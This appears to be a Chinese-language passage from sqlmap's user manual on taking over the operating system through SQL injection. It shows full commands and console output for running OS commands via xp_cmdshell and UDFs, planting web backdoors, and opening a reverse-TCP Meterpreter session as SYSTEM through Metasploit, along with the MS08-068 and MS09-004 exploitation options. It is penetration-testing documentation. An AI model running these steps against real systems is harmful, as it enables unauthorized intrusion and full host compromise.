当数据库管理系统是微软的SQL Server时,Sqlmap通过存储过程xp_cmdshell来执行任意命令。
若xp_cmdshell被禁用(SQL Server
>= 2005时默认禁用)Sqlmap会启用它;
若xp_cmdshell不存在,Sqlmap会创建它。
当用户想要看到命令执行的标准输出时,Sqlmap使用可列举的注入技术(盲注、带内和基于错误的注入),而当用户不想看到命令执行的标准输出时,堆查询注入技术将被用于执行命令。
下例的目标是PostgreSQL:
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1
部分输出如下所示:
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
使用参数“–os-shell”可以模拟一个可以执行任意命令的shell,和“–sql-shell”一样这个shell也可以用Tab键补全,支持历史记录。
当堆查询不被支持(如PHP或ASP+Mysql)且数据库管理系统是MySQL时,仍然可以通过SELECT的从句INTO OUTFILE在Web所在主机的可写目录创建一个Web后门,通过这个Web后门来执行命令。Sqlmap支持这一技术并要求用户提供一些用逗号分割的可能是可写目录的路径。Sqlmap支持以下这些服务器端脚本语言:
ASP
ASP.NET
JSP
PHP
2.带外TCP连接:Meterpreter及相关
参数:–os-pwn、–os-smbrelay、–os-bof、–priv-esc、–msf-path和–tmp-path
若数据库管理系统是MySQL、PostgreSQL或微软的SQL Server且当前用户有相关权限Sqlmap就有可能在攻击者的主机和数据库所在主机之间建立带外TCP连接。根据用户的选择,此连接可以是交互式命令shell,Meterpreter会话或图形用户界面(VNC)会话。
Sqlmap要靠Metasploit生成shellcode,在数据库所在主机执行shellcode有以下四种技术:
数据库通过Sqlmap创建的用户自定义函数sys_bineval()在内存中执行Metasploit的shellcode。支持MySQL和PostgreSQL。参数“–os-pwn”。
通过Sqlmap自己的用户自定义函数(MySQL和PostgreSQL中的sys_exec(),微软SQL Server中的xp_cmdshell())上传并执行Metasploit的“stand-alone payload stager”。参数:“–os-pwn”。
利用远程代码执行漏洞MS08-068。攻击者的机器要用Metasploit的smb_relay监听来自目标机器的连接。要求在Linux/Unix上以root权限运行Sqlmap且目标DBMS在Windows上以管理员权限运行。参数:“–os-smbrelay”。
在微软SQL Server 2000和2005中可通过存储过程sp_replwritetovarbin的堆缓冲区溢出漏洞(MS09-004)在内存中执行Metasploit的shellcode。Sqlmap有自己的数据执行保护绕过技术可以成功利用漏洞,但需要Metasploit生成shellcode以便在成功利用漏洞时执行shellcode。参数:“–os-bof”。
下面是以MySQL为目标的例子:
python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on
all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter > Server username: NT AUTHORITYSYSTEM
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit